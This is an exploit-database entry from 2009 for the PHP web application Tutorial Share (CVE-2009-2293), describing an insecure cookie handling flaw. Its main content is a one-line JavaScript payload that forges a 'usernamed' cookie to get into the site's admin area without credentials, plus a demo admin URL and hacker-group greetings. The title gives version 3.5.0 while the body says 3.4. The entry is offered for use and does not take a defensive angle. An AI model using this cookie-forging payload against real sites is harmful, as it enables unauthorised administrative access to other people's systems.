Tutorial Share 3.5.0 - Insecure Cookie Handling

Author: Evil-Cod3r
type: webapps
platform: php
port: 
date_added: 2009-05-21 
date_updated:  
verified: 1 
codes: OSVDB-54704;CVE-2009-2293 
tags: 
aliases:  
screenshot_url:  
application_url: 

--------------------------------------------------------------
Tutorial Share 3.4 Insecure Cookie Handling Vulnerability
---------------------------------------------------------------
Auothr :Evil-Cod3r
Home: Creativexploit.com
Contact : Xky@hotmail.com & ie7@windowslive.com
Software : Tutorial Share 3.4
Home : tutorial-share.com
---------------------------------------------------------------
Exploit:
---------
www.site.com/admin/
javascript:document.cookie="usernamed=demo;path=/";
demo = username site :D
---------------------------------------------------------------
demo:
---------
http://www.tutorial-share.com/demo/admin/
-----------------------------------------------------------------------------------------------------
The-g0bL!N  - His0k4  - Cyb3r-Devil  - Mangear Play :) & Str0ke
-----------------------------------------------------------------------------------------------------

# milw0rm.com [2009-05-22]